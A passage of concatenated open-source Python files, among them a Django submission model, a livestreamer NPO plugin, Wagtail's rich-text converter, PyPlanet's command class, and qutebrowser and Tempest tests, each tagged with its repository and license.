#for handled in SubmissionHandlingOccurrence.objects.filter(submission=self):
# if handled.handled.method == _DUPLICATE_ATTACHMENT:
# return True
#return False
for attach in self.attachments.all():
if attach.is_duplicate():
return True
return False
def export(self):
""" walks through the submission and bundles it
in an exportable format with the original submitting IP
and time, as well as a reference to the original post
"""
#print "processing %s (%s)" % (self,self.raw_post)
if self.raw_post is None:
raise Submission.DoesNotExist("Submission (%s) has empty raw_post" % self.pk)
if not os.path.exists(self.raw_post):
raise Submission.DoesNotExist("%s could not be found" % self.raw_post)
post_file = open(self.raw_post, "r")
submit_time = str(self.submit_time)
# first line is content type
content_type = post_file.readline().split(":")[1].strip()
# second line is content length
content_length = post_file.readline().split(":")[1].strip()
# third line is empty
post_file.readline()
# the rest is the actual body of the post
headers = { "content-type" : content_type,
"content-length" : content_length,
"time-received" : str(self.submit_time),
"original-ip" : str(self.submit_ip),
"domain" : self.domain.name
}
# the format will be:
# {headers} (dict)
# (empty line)
# <body>
return simplejson.dumps(headers) + "\n\n" + post_file.read()
#dmyung 11/5/2009 - removing signal and refactor attachment processing to the submit processor
#post_save.connect(process_attachments, sender=Submission)
class Attachment(models.Model):
    '''An Attachment object, which is part of a submission. Many submissions
    will only have one attachment, but multipart submissions will be broken
    into their individual attachments.'''
    submission = models.ForeignKey(Submission, related_name="attachments")
    attachment_content_type = models.CharField(_('Attachment Content-Type'),max_length=64)
    attachment_uri = models.CharField(_('File attachment URI'),max_length=255)
    filepath = models.FilePathField(_('Attachment File'),match='.*\.attach$',path=settings.RAPIDSMS_APPS['receiver']['xform_submission_path'],max_length=255)
    filesize = models.IntegerField(_('Attachment filesize'))
    checksum = models.CharField(_('Attachment MD5 Checksum'),max_length=32)
    class Meta:
        ordering = ('-submission',)
        verbose_name = _("Submission Attachment")
    def handled(self, handle_type, message=""):
        """ For now, handling any attachment is equivalent to handling the
        submission instance. We can imagine changing this at some future date
        to use some other sort of heuristic for when a submission is 'handled'.
        """
        return self.submission.handled(handle_type, message)
    def unhandled(self, handle_type):
        """ Deletes the 'handled' reference for this attachment's submission"""
        self.submission.unhandled(handle_type)
    def is_xform(self):
        """Whether this attachment is the xform payload of its submission."""
        return self.attachment_uri == _XFORM_URI
    def get_media_url(self):
        """URL under MEDIA_URL at which this attachment file is served."""
        basename = os.path.basename(self.filepath)
        return settings.MEDIA_URL + "attachment/" + basename
    def get_contents(self):
        """Get the contents for an attachment object, by reading (fully) the
        underlying file.  Returns None (after logging) if the read fails."""
        fin = None
        try:
            fin = open(self.filepath, 'r')
            return fin.read()
        # 'as e' form works on Python 2.6+ and 3, unlike 'Exception, e'.
        except Exception as e:
            # BUG FIX: use the exception itself instead of e.message;
            # .message is deprecated and absent on modern exceptions.
            logging.error("Unable to open attachment %s. %s" % (self, e),
                          extra={"exception": e})
        finally:
            if fin: fin.close()
    def delete(self, **kwargs):
        """Delete the attachment row and its on-disk file."""
        try:
            # if for some reason deleting the file fails,
            # we should still continue deleting the data model
            os.remove(self.filepath)
        except Exception as e:
            logging.warn(str(e))
        super(Attachment, self).delete()
    def has_duplicate(self):
        '''
        Checks if this has any duplicate submissions,
        defined by having the same checksum, but a different
        id.
        '''
        # .exists() avoids loading every matching row just to count them.
        return Attachment.objects.filter(checksum=self.checksum).exclude(id=self.id).exists()
    def is_duplicate(self):
        '''
        Checks if this is a duplicate submission,
        defined by having other submissions with
        the same checksum, but a different id, and
        NOT being the first one
        '''
        matches = Attachment.objects.filter(checksum=self.checksum)
        if len(matches) <= 1:
            return False
        # BUG FIX: chaining .order_by() calls *replaces* the ordering instead
        # of appending to it, so the original effectively ordered by id only.
        # Passing both fields to a single order_by() gives the intended
        # "earliest submission, then lowest id" ordering, and the redundant
        # second query is gone.
        first = matches.order_by("submission__submit_time", "id")[0]
        return self.id != first.id
    def has_linked_schema(self):
        '''
        Returns whether this submission has a linked schema, defined
        by having something in the xform manager that knows about this.
        '''
        # this method, and the one below are semi-dependant on the
        # xformmanager app. if that app is not running, this will
        # never be true but will still resolve.
        if self.get_linked_metadata():
            return True
        return False
    def get_linked_metadata(self):
        '''
        Returns the linked metadata for the form, if it exists, otherwise
        returns nothing.
        '''
        if hasattr(self, "form_metadata"):
            try:
                return self.form_metadata.get()
            except:
                return None
        return None
    def most_recent_annotation(self):
        """Get the most recent annotation of this attachment, if it exists"""
        if (self.annotations.count() > 0):
            return self.annotations.order_by("-date")[0]
    def __unicode__(self):
        return "%s : %s" % (self.id, self.attachment_uri)
    def display_string(self):
        """Human-readable multi-line summary, used in duplicate logging."""
        return """\tDomain: %s
\tAttachment: %s
\tSubmission: %s
\tSubmit Time: %s
\tContent Type: %s
\tURI: %s
\tURL to view on server: %s
""" % \
        (self.submission.domain, self.id, self.submission.id,
         self.submission.submit_time, self.attachment_content_type,
         self.attachment_uri,
         build_url(reverse('single_submission', args=(self.submission.id,))))
class Annotation(models.Model):
    """A free-text note attached to a single Attachment."""
    # NOTE: we could make these total generic with django content-types, but
    # I think it will be easier to only annotate attachments.
    attachment = models.ForeignKey(Attachment, related_name="annotations")
    date = models.DateTimeField(default = datetime.utcnow)
    text = models.CharField(max_length=255)
    user = models.ForeignKey(User)
    # eventually link to an outgoing sms message on the annotation.
    #sms_message = models.ForeignKey(OutgoingMessage, related_name="annotations",
    #                                null=True, blank=True)
    # for threading these, for now this is unused
    parent = models.ForeignKey("self", related_name="children", null=True, blank=True)
    def __unicode__(self):
        when = self.date.date()
        return '"%s" by %s on %s' % (self.text, self.user, when)
    def to_html(self):
        """Render the annotation as a small standalone HTML fragment."""
        template = '<div class="annotation"><div class="annotation-date">%s</div><div class="annotation-body">%s</div></div>'
        return template % (self.date.date(), self.text)
class SubmissionHandlingType(models.Model):
    '''A way in which a submission can be handled. Contains a reference
    to both an app, that did the handling, and a method, representing
    how the app did something. For example, one app could be "xformmanager"
    and a way of handling could be "saved_form_data".
    If app.methodname is a valid python method, receiver will attempt
    to call it with the handling occurrence and a dictionary of additional
    parameters as the arguments, and if
    the method returns an HttpResponse object that will override
    the default response. See __init__.py in this module for an example.
    '''
    # todo? these model names are pretty long-winded
    # Short identifier of the handling app, e.g. "receiver".
    app = models.CharField(max_length=50)
    # Name of the handling action, e.g. "duplicate_attachment" or "deleted".
    method = models.CharField(max_length=100)
    def __unicode__(self):
        return "%s: %s" % (self.app, self.method)
class SubmissionHandlingOccurrence(models.Model):
    """A class linking submissions to ways of handling them. Other apps
    should create instances of this model by calling submission.handled()
    with the appropriate handling type as submissions are processed.
    An app creating an instance of this implies that the app somehow
    'understood' the submission, so unparsed or error-full submisssions
    should not have instances of this."""
    # todo? these model names are pretty long-winded
    # The submission that was handled; reverse accessor is ways_handled.
    submission = models.ForeignKey(Submission, related_name="ways_handled")
    # Which app/method combination did the handling.
    handled = models.ForeignKey(SubmissionHandlingType)
    # message allows any handler to add a short message that
    # the receiver app will display to the user
    message = models.CharField(max_length=100, null=True, blank=True)
def log_duplicates(sender, instance, created, **kwargs):
    '''A django post-save event that logs duplicate attachments to the
    handling log and marks their submission as handled.'''
    # only log dupes on newly created attachments, not all of them
    if not created:
        return
    if not instance.is_duplicate():
        return
    try:
        error = "Got a duplicate attachment: %s." %\
                (instance.display_string())
        logging.error(error)
        # also mark that we've handled this as a duplicate.
        # get_or_create replaces the original get / DoesNotExist / create
        # dance with a single call.
        handle_type, _ = SubmissionHandlingType.objects.get_or_create(
            app=_RECEIVER, method=_DUPLICATE_ATTACHMENT)
        instance.submission.handled(handle_type)
    except Exception as e:
        logging.error("Problem logging a duplicate attachment: %s. The error is: %s" %\
                      (instance.display_string(), e))
# Register to receive signals on every attachment save.
# Connected at module import time so duplicate detection runs no matter
# which code path created the Attachment.
post_save.connect(log_duplicates, sender=Attachment)
| icomms/wqmanager | apps/receiver/models.py | Python | bsd-3-clause | 16,638 |
"""Plugin for NPO: Nederlandse Publieke Omroep
Supports:
VODs: http://www.npo.nl/het-zandkasteel/POMS_S_NTR_059963
Live: http://www.npo.nl/live/nederland-1
"""
import re
import json
from livestreamer.compat import quote
from livestreamer.plugin import Plugin
from livestreamer.plugin.api import http
from livestreamer.stream import HTTPStream, HLSStream
# Matches npo.nl page URLs (http or https, optional subdomain).
# NOTE(review): the dots in "npo.nl" are unescaped and the pattern is
# unanchored -- intentionally loose, but worth confirming upstream.
_url_re = re.compile("http(s)?://(\w+\.)?npo.nl/")
# Present as a desktop Chrome browser; presumably the NPO endpoints vary
# their response by user agent -- verify before changing.
HTTP_HEADERS = {
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.9 Safari/537.36"
}
class NPO(Plugin):
    """Livestreamer plugin for npo.nl VOD pages and live channels."""

    @classmethod
    def can_handle_url(cls, url):
        return _url_re.match(url)

    def get_token(self):
        """Fetch the player token and apply NPO's digit-swap de-scrambling.

        Mirrors npoplayer.js: the first two digits found after position 4
        are swapped, with fallback positions 12/13 when fewer than two
        digits are present.
        """
        url = 'http://ida.omroep.nl/npoplayer/i.js?s={}'.format(quote(self.url))
        token = http.get(url, headers=HTTP_HEADERS).content
        token = re.compile('token.*?"(.*?)"', re.DOTALL | re.IGNORECASE).search(token).group(1)
        # Great the have a ['en','ok','t'].reverse() decurity option in npoplayer.js
        secured = list(token)
        token = list(token)
        first = -1
        second = -1
        for i, c in enumerate(token):
            # NOTE: "i < len(token)" is always true; kept to match the
            # original (and the upstream JS) exactly.
            if c.isdigit() and 4 < i < len(token):
                if first == -1:
                    first = i
                else:
                    second = i
                    break
        if first == -1:
            first = 12
        if second == -1:
            second = 13
        secured[first] = token[second]
        secured[second] = token[first]
        return ''.join(secured)

    def _get_meta(self):
        """Resolve the program id from the live page and fetch its metadata."""
        html = http.get('http://www.npo.nl/live/{}'.format(self.npo_id), headers=HTTP_HEADERS).content
        program_id = re.compile('data-prid="(.*?)"', re.DOTALL | re.IGNORECASE).search(html).group(1)
        meta = http.get('http://e.omroep.nl/metadata/{}'.format(program_id), headers=HTTP_HEADERS).content
        # The endpoint wraps the JSON in a JSONP-style callback; extract the
        # bare object before parsing.
        meta = re.compile('({.*})', re.DOTALL | re.IGNORECASE).search(meta).group(1)
        return json.loads(meta)

    def _get_vod_streams(self):
        """Return the progressive HTTP stream for a VOD page."""
        url = 'http://ida.omroep.nl/odi/?prid={}&puboptions=adaptive,h264_bb,h264_sb,h264_std&adaptive=no&part=1&token={}'\
            .format(quote(self.npo_id), quote(self.get_token()))
        res = http.get(url, headers=HTTP_HEADERS)
        data = res.json()
        streams = {}
        stream = http.get(data['streams'][0].replace('jsonp', 'json'), headers=HTTP_HEADERS).json()
        streams['best'] = streams['high'] = HTTPStream(self.session, stream['url'])
        return streams

    def _get_live_streams(self):
        """Return the HLS variant streams for a live channel."""
        meta = self._get_meta()
        # BUG FIX: filter() returns an iterator on Python 3, which is not
        # subscriptable; a list comprehension works on both 2 and 3.
        stream = [s for s in meta['streams'] if s['type'] == 'hls'][0]['url']
        url = 'http://ida.omroep.nl/aapi/?type=jsonp&stream={}&token={}'.format(stream, self.get_token())
        streamdata = http.get(url, headers=HTTP_HEADERS).json()
        deeplink = http.get(streamdata['stream'], headers=HTTP_HEADERS).content
        deeplink = re.compile('"(.*?)"', re.DOTALL | re.IGNORECASE).search(deeplink).group(1)
        playlist_url = deeplink.replace("\\/", "/")
        return HLSStream.parse_variant_playlist(self.session, playlist_url)

    def _get_streams(self):
        """Dispatch to live or VOD handling based on the URL path."""
        urlparts = self.url.split('/')
        self.npo_id = urlparts[-1]
        if (urlparts[-2] == 'live'):
            return self._get_live_streams()
        else:
            return self._get_vod_streams()
__plugin__ = NPO
| charmander/livestreamer | src/livestreamer/plugins/npo.py | Python | bsd-2-clause | 3,412 |
from django.utils.functional import cached_property
from django.utils.html import escape
from wagtail.core.models import Page
from wagtail.core.rich_text import features as feature_registry
from wagtail.core.rich_text.rewriters import EmbedRewriter, LinkRewriter, MultiRuleRewriter
from wagtail.core.whitelist import Whitelister, allow_without_attributes
class WhitelistRule:
    """Associates an HTML element name with the whitelist handler that
    cleans occurrences of that element."""

    def __init__(self, element, handler):
        self.handler = handler
        self.element = element
class EmbedTypeRule:
    """Associates an embed type name (e.g. 'image') with the handler that
    converts embeds of that type."""

    def __init__(self, embed_type, handler):
        self.handler = handler
        self.embed_type = embed_type
class LinkTypeRule:
    """Associates a link type name (e.g. 'page') with the handler that
    converts links of that type."""

    def __init__(self, link_type, handler):
        self.handler = handler
        self.link_type = link_type
# Whitelist rules which are always active regardless of the rich text features that are enabled
BASE_WHITELIST_RULES = {
    # '[document]' is the parser's name for the root node of the tree.
    '[document]': allow_without_attributes,
    'p': allow_without_attributes,
    # <div> is accepted here but renamed to <p> by DbWhitelister.clean_tag_node.
    'div': allow_without_attributes,
    'br': allow_without_attributes,
}
class DbWhitelister(Whitelister):
    """
    A custom whitelisting engine to convert the HTML as returned by the rich text editor
    into the pseudo-HTML format stored in the database (in which images, documents and other
    linked objects are identified by ID rather than URL):
    * accepts a list of WhitelistRules to extend the initial set in BASE_WHITELIST_RULES;
    * replaces any element with a 'data-embedtype' attribute with an <embed> element, with
    attributes supplied by the handler for that type as defined in embed_handlers;
    * rewrites the attributes of any <a> element with a 'data-linktype' attribute, as
    determined by the handler for that type defined in link_handlers, while keeping the
    element content intact.
    """
    def __init__(self, converter_rules):
        # Keep the full rule list: embed_handlers / link_handlers are derived
        # lazily from it below.
        self.converter_rules = converter_rules
        # Element whitelist = always-active base rules plus any WhitelistRule
        # entries from the feature-specific converter rules.
        self.element_rules = BASE_WHITELIST_RULES.copy()
        for rule in self.converter_rules:
            if isinstance(rule, WhitelistRule):
                self.element_rules[rule.element] = rule.handler
    @cached_property
    def embed_handlers(self):
        # Map of embed type name -> handler, built once on first access.
        return {
            rule.embed_type: rule.handler for rule in self.converter_rules
            if isinstance(rule, EmbedTypeRule)
        }
    @cached_property
    def link_handlers(self):
        # Map of link type name -> handler, built once on first access.
        return {
            rule.link_type: rule.handler for rule in self.converter_rules
            if isinstance(rule, LinkTypeRule)
        }
    def clean_tag_node(self, doc, tag):
        """Clean one element: convert data-embedtype elements to <embed>,
        rewrite data-linktype anchors, delegate everything else upward."""
        if 'data-embedtype' in tag.attrs:
            embed_type = tag['data-embedtype']
            # fetch the appropriate embed handler for this embedtype
            try:
                embed_handler = self.embed_handlers[embed_type]
            except KeyError:
                # discard embeds with unrecognised embedtypes
                tag.decompose()
                return
            embed_attrs = embed_handler.get_db_attributes(tag)
            embed_attrs['embedtype'] = embed_type
            embed_tag = doc.new_tag('embed', **embed_attrs)
            embed_tag.can_be_empty_element = True
            tag.replace_with(embed_tag)
        elif tag.name == 'a' and 'data-linktype' in tag.attrs:
            # first, whitelist the contents of this tag
            for child in tag.contents:
                self.clean_node(doc, child)
            link_type = tag['data-linktype']
            try:
                link_handler = self.link_handlers[link_type]
            except KeyError:
                # discard links with unrecognised linktypes
                tag.unwrap()
                return
            link_attrs = link_handler.get_db_attributes(tag)
            link_attrs['linktype'] = link_type
            tag.attrs.clear()
            tag.attrs.update(**link_attrs)
        else:
            if tag.name == 'div':
                # Normalise <div> to <p> before standard whitelist handling.
                tag.name = 'p'
            super(DbWhitelister, self).clean_tag_node(doc, tag)
class EditorHTMLConverter:
    """Two-way converter between rich text editor HTML and the database
    representation, configured from a list of enabled feature names."""
    def __init__(self, features=None):
        if features is None:
            features = feature_registry.get_default_features()
        self.converter_rules = []
        for feature in features:
            rule = feature_registry.get_converter_rule('editorhtml', feature)
            if rule is not None:
                # rule should be a list of WhitelistRule() instances - append this to
                # the master converter_rules list
                self.converter_rules.extend(rule)
    @cached_property
    def whitelister(self):
        # Built lazily; DbWhitelister derives its handler tables from
        # converter_rules.
        return DbWhitelister(self.converter_rules)
    def to_database_format(self, html):
        """Convert editor HTML into the stored database representation."""
        return self.whitelister.clean(html)
    @cached_property
    def html_rewriter(self):
        # Build the rewriter that expands stored <a linktype=...> and
        # <embed embedtype=...> elements via each handler's
        # expand_db_attributes; links are rewritten before embeds.
        embed_rules = {}
        link_rules = {}
        for rule in self.converter_rules:
            if isinstance(rule, EmbedTypeRule):
                embed_rules[rule.embed_type] = rule.handler.expand_db_attributes
            elif isinstance(rule, LinkTypeRule):
                link_rules[rule.link_type] = rule.handler.expand_db_attributes
        return MultiRuleRewriter([
            LinkRewriter(link_rules), EmbedRewriter(embed_rules)
        ])
    def from_database_format(self, html):
        """Convert the stored database representation back into HTML."""
        return self.html_rewriter(html)
class PageLinkHandler:
    """
    PageLinkHandler will be invoked whenever we encounter an <a> element in HTML content
    with an attribute of data-linktype="page". The resulting element in the database
    representation will be:
    <a linktype="page" id="42">hello world</a>
    """
    @staticmethod
    def get_db_attributes(tag):
        """
        Given an <a> tag that we've identified as a page link embed (because it has a
        data-linktype="page" attribute), return a dict of the attributes we should
        have on the resulting <a linktype="page"> element.
        """
        return {'id': tag['data-id']}
    @staticmethod
    def expand_db_attributes(attrs):
        """Expand stored page-link attributes into an opening <a ...> tag
        (only the opening tag is returned; the caller supplies content and
        the closing tag)."""
        try:
            page = Page.objects.get(id=attrs['id'])
            attrs = 'data-linktype="page" data-id="%d" ' % page.id
            parent_page = page.get_parent()
            if parent_page:
                # NOTE(review): data-parent-id is presumably consumed by the
                # editor's page chooser -- confirm against the front-end code.
                attrs += 'data-parent-id="%d" ' % parent_page.id
            return '<a %shref="%s">' % (attrs, escape(page.specific.url))
        except Page.DoesNotExist:
            # The linked page is gone: emit a bare anchor so the link text
            # still renders.
            return "<a>"
| nealtodd/wagtail | wagtail/admin/rich_text/converters/editor_html.py | Python | bsd-3-clause | 6,370 |
import asyncio
from inspect import iscoroutinefunction
from pyplanet.contrib.command.params import ParameterParser
class Command:
    """
    The command instance describes the command itself, the target to fire and all other related information, like
    admin command or aliases.

    Some examples of some commands:

    .. code-block:: python

        # Admin command with permission on it.
        Command(command='reboot', target=self.reboot_pool, perms='admin:reboot', admin=True)

        # Normal user command with optional argument.
        Command(command='list', target=self.show_map_list)\\
            .add_param(name='search', required=False)

    """

    def __init__(
        self, command, target, aliases=None, admin=False, namespace=None, parser=None, perms=None, description=None
    ):
        """
        Initiate a command.

        :param command: Command text (prefix without parameters).
        :param target: Target method to fire.
        :param aliases: Alias(ses) for the command.
        :param admin: Register command in admin context.
        :param namespace: Custom namespace, this can be used to create commands like '/prog start' and '/prog end'
                          where 'prog' is the namespace.
        :param perms: Required parameters, default everyone is allowed.
        :param parser: Custom parser.
        :param description: Description of the command.
        :type command: str
        :type target: any
        :type aliases: str[]
        :type admin: bool
        :type namespace: str, str[]
        :type perms: list,str
        :type parser: any
        :type description: str
        """
        self.command = command
        self.target = target
        self.aliases = aliases or list()
        self.admin = admin
        # BUG FIX: normalize the namespace to a list exactly once, here.
        # The original normalized it lazily inside match() and __str__(),
        # mutating self.namespace as a side effect of read-only queries.
        if namespace and not isinstance(namespace, (list, tuple)):
            namespace = [namespace]
        self.namespace = namespace
        if isinstance(perms, str):
            perms = [perms]
        self.perms = perms
        self.parser = parser or ParameterParser(
            '{} {}'.format(' '.join(self.namespace), self.command) if self.namespace else self.command
        )
        self.description = description

    def match(self, raw):
        """
        Try to match the command with the given input in array style (splitted by spaces).

        :param raw: Raw input, split by spaces.
        :type raw: list
        :return: Boolean if command matches.
        """
        input = raw[:]
        if len(input) == 0 or (len(input) == 1 and input[0] == ''):
            return False
        if self.admin:
            # Admin commands are addressed either as '/command' or 'admin command'.
            if input[0][0:1] == '/':
                input[0] = input[0][1:]
            elif input[0] == 'admin':
                input.pop(0)
            else:
                return False
        # Check against namespace.
        if len(input) > 0 and self.namespace and any(input[0] == n for n in self.namespace):
            input.pop(0)
        elif self.namespace:
            return False
        if not len(input):
            return False
        command = input.pop(0)
        return self.command == command or command in self.aliases

    def get_params(self, input):
        """
        Get params in array from input in array.

        :param input: Array of raw input.
        :type input: list
        :return: Array of parameters, stripped of the command name and namespace, if defined.
        :rtype: list
        """
        if self.admin:
            if input[0][0:1] == '/':
                input[0] = input[0][1:]
            elif input[0] == 'admin':
                input.pop(0)
        if self.namespace:
            # Remove the namespace token; the command token itself is
            # removed by the unconditional pop below.
            input.pop(0)
        input.pop(0)
        return input

    def add_param(
        self, name: str,
        nargs=1,
        type=str,
        default=None,
        required: bool=True,
        help: str=None,
        dest: str=None,
    ):
        """
        Add positional parameter.

        :param name: Name of parameter, will be used to store result into!
        :param nargs: Number of arguments, use integer or '*' for multiple or infinite.
        :param type: Type of value, keep str to match all types. Use any other to try to parse to the type.
        :param default: Default value when no value is given.
        :param required: Set the parameter required state, defaults to true.
        :param help: Help text to display when parameter is invalid or not given and required.
        :param dest: Destination to save into namespace result (defaults to name).
        :return: parser instance
        :rtype: pyplanet.contrib.command.command.Command
        """
        self.parser.add_param(
            name=name, nargs=nargs, type=type, default=default, required=required, help=help, dest=dest
        )
        return self

    async def handle(self, instance, player, argv):
        """
        Handle command parsing and execution.

        :param player: Player object.
        :param argv: Arguments in array
        :type player: pyplanet.apps.core.maniaplanet.models.player.Player
        """
        # Check permissions.
        if not await self.has_permission(instance, player):
            await instance.chat(
                '$z$sYou are not authorized to use this command!',
                player.login
            )
            return
        # Strip off the namespace and command.
        paramv = self.get_params(argv)
        # Parse, validate and show errors if any.
        self.parser.parse(paramv)
        if not self.parser.is_valid():
            await instance.gbx.multicall(
                instance.chat('$z$sCommand operation got invalid arguments: {}'.format(', '.join(self.parser.errors)), player),
                instance.chat('$z$s >> {}'.format(self.usage_text), player),
            )
            return
        # We are through. Call our target!
        if iscoroutinefunction(self.target):
            return await self.target(player=player, data=self.parser.data, raw=argv, command=self)
        return self.target(player=player, data=self.parser.data, raw=argv, command=self)

    async def has_permission(self, instance, player):
        """
        Checks whether the provided player has the permission to execute this command.

        :param instance: Controller Instance
        :type instance: pyplanet.core.instance.Instance
        :param player: Player requesting execution of this command.
        :type player: pyplanet.apps.core.maniaplanet.models.player.Player
        :return: Whether provided player has permission to execute this command.
        """
        player_has_permission = True
        if self.perms and len(self.perms) > 0:
            # All the given perms need to be matching!
            is_allowed = await asyncio.gather(*[
                instance.permission_manager.has_permission(player, perm) for perm in self.perms
            ])
            if not all(allowed is True for allowed in is_allowed):
                player_has_permission = False
        return player_has_permission

    @property
    def usage_text(self):
        """
        The usage text line for the command.
        """
        # BUG FIX: the original interpolated self.namespace directly, which
        # omitted the separating space and could render a Python list.
        text = 'Usage: /{}{}{}'.format(
            '/' if self.admin else '',
            '{} '.format(' '.join(self.namespace)) if self.namespace else '',
            self.command
        )
        for param in self.parser.params:
            text += ' {}{}:{}{}'.format(
                '[' if not param['required'] else '',
                param['name'],
                getattr(param['type'], '__name__', 'any'),
                ']' if not param['required'] else '',
            )
        return text

    @property
    def params_text(self):
        """Multi-line description of the command's parameters."""
        lines = []
        for param in self.parser.params:
            lines.append('{}{}:{}{}{}'.format(
                '[' if not param['required'] else '',
                param['name'],
                getattr(param['type'], '__name__', 'any'),
                ']' if not param['required'] else '',
                ' = {}'.format(param['help']) if param['help'] else ''
            ))
        return '\n'.join(lines)

    @property
    def perms_text(self):
        """Multi-line listing of the required permissions."""
        if not self.perms:
            return ''
        return '\n'.join('{}'.format(perm) for perm in self.perms)

    def __str__(self):
        return '/{}{}{}'.format(
            '/' if self.admin else '',
            '|'.join(self.namespace) if self.namespace else self.command,
            ' ' + self.command if self.namespace else '',
        )
| PyPlanet/PyPlanet | pyplanet/contrib/command/command.py | Python | gpl-3.0 | 7,587 |
#package QCAnalysis::TagCount;
#use base 'QCAnalysis';
#use strict;
#no strict "refs";
#use IO::File;
# Accumulates tag -> "multiplex_tag" entries across parsed lines.
# NOTE(review): this is module-global, so parsing several files in one
# process accumulates tags from all of them -- confirm that is intended.
values = {}


def parse_file(*argv):
    """Parse a tag-count file and record its values on the analysis object.

    Positional arguments (kept for compatibility with the caller):
    argv[0] -- class name (unused), argv[1] -- path to the tag-count file,
    argv[2] -- analysis object to populate.  Returns the analysis object.
    """
    classname = argv[0]
    filename = argv[1]
    analysis = argv[2]
    print("opening: " + filename)
    try:
        fh = open(filename)
    except IOError:
        # BUG FIX: the original printed the error but then fell through to
        # the read loop with 'fh' undefined, raising a NameError.
        print("Cannot open file: " + filename)
        return analysis
    try:
        analysis.add_property("tool", "tgac_tag_count")
        for line in fh:
            parse_tag_sequence_count(analysis, line.strip())
    finally:
        # BUG FIX: the original never closed the file handle.
        fh.close()
    for key, value in values.items():
        analysis.add_valid_type(key, value)
    return analysis


def parse_tag_sequence_count(analysis, to_parse):
    """Parse one tab-separated line: lane, <ignored>, tag sequence, count.

    Registers the tag in the module-level 'values' map and, when the line's
    lane matches the analysis' "lane" property, records the tag's count.
    """
    line = to_parse.split("\t")
    values[line[2]] = "multiplex_tag"
    if line[0] == analysis.get_property("lane"):
        analysis.add_general_value(line[2], line[3])
# vim: ft=python fileencoding=utf-8 sts=4 sw=4 et:
# Copyright 2015-2016 Florian Bruhin (The Compiler) <mail@qutebrowser.org>
#
# This file is part of qutebrowser.
#
# qutebrowser is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# qutebrowser is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with qutebrowser. If not, see <http://www.gnu.org/licenses/>.
"""Tests for qutebrowser.commands.runners."""
import pytest
from qutebrowser.commands import runners, cmdexc
class TestCommandRunner:
    """Tests for CommandRunner."""
    def test_parse_all(self, cmdline_test):
        """Test parsing of commands.
        See https://github.com/The-Compiler/qutebrowser/issues/615
        Args:
            cmdline_test: A pytest fixture which provides testcases.
        """
        cr = runners.CommandRunner(0)
        # parse_all is lazy; wrapping in list() forces evaluation so any
        # NoSuchCommandError is actually raised.
        if cmdline_test.valid:
            list(cr.parse_all(cmdline_test.cmd, aliases=False))
        else:
            with pytest.raises(cmdexc.NoSuchCommandError):
                list(cr.parse_all(cmdline_test.cmd, aliases=False))
    def test_parse_all_with_alias(self, cmdline_test, config_stub):
        """An alias should parse (or fail) exactly like its target command."""
        config_stub.data = {'aliases': {'alias_name': cmdline_test.cmd}}
        cr = runners.CommandRunner(0)
        if cmdline_test.valid:
            assert len(list(cr.parse_all("alias_name"))) > 0
        else:
            with pytest.raises(cmdexc.NoSuchCommandError):
                list(cr.parse_all("alias_name"))
    def test_parse_empty_with_alias(self):
        """An empty command should not crash.
        See https://github.com/The-Compiler/qutebrowser/issues/1690
        """
        cr = runners.CommandRunner(0)
        with pytest.raises(cmdexc.NoSuchCommandError):
            list(cr.parse_all(''))
    def test_parse_with_count(self):
        """Test parsing of commands with a count."""
        cr = runners.CommandRunner(0)
        result = cr.parse('20:scroll down')
        assert result.cmd.name == 'scroll'
        assert result.count == 20
        assert result.args == ['down']
        assert result.cmdline == ['scroll', 'down']
    def test_partial_parsing(self):
        """Test partial parsing with a runner where it's enabled.
        The same with it being disabled is tested by test_parse_all.
        """
        cr = runners.CommandRunner(0, partial_match=True)
        # 'message-i' is an unambiguous prefix of 'message-info'.
        result = cr.parse('message-i')
        assert result.cmd.name == 'message-info'
| halfwit/qutebrowser | tests/unit/commands/test_runners.py | Python | gpl-3.0 | 2,859 |
# Copyright 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_log import log as logging
from testtools import matchers
from tempest.api.compute import base
from tempest.common import identity
from tempest.common import tempest_fixtures as fixtures
from tempest.lib.common.utils import data_utils
from tempest.lib import decorators
LOG = logging.getLogger(__name__)
class QuotasAdminTestJSON(base.BaseV2ComputeAdminTest):
    """Admin-side tests for the per-tenant os-quota-sets compute API."""

    force_tenant_isolation = True

    def setUp(self):
        # NOTE(mriedem): Avoid conflicts with os-quota-class-sets tests.
        self.useFixture(fixtures.LockFixture('compute_quotas'))
        super(QuotasAdminTestJSON, self).setUp()

    @classmethod
    def setup_clients(cls):
        super(QuotasAdminTestJSON, cls).setup_clients()
        cls.adm_client = cls.os_admin.quotas_client

    @classmethod
    def resource_setup(cls):
        super(QuotasAdminTestJSON, cls).resource_setup()
        # NOTE(afazekas): these test cases should always create and use a new
        # tenant most of them should be skipped if we can't do that
        cls.demo_tenant_id = cls.quotas_client.tenant_id
        cls.default_quota_set = {
            'injected_file_content_bytes', 'metadata_items',
            'injected_files', 'ram', 'floating_ips', 'fixed_ips',
            'key_pairs', 'injected_file_path_bytes', 'instances',
            'security_group_rules', 'cores', 'security_groups',
        }

    @decorators.idempotent_id('3b0a7c8f-cf58-46b8-a60c-715a32a8ba7d')
    def test_get_default_quotas(self):
        # Admin can get the default resource quota set for a tenant
        expected_keys = self.default_quota_set | {'id'}
        fetched = self.adm_client.show_default_quota_set(
            self.demo_tenant_id)['quota_set']
        self.assertEqual(fetched['id'], self.demo_tenant_id)
        for key in expected_keys:
            self.assertIn(key, fetched.keys())

    @decorators.idempotent_id('55fbe2bf-21a9-435b-bbd2-4162b0ed799a')
    def test_update_all_quota_resources_for_tenant(self):
        # Admin can update all the resource quota limits for a tenant
        original = self.adm_client.show_default_quota_set(
            self.demo_tenant_id)['quota_set']
        desired = {'injected_file_content_bytes': 20480,
                   'metadata_items': 256, 'injected_files': 10,
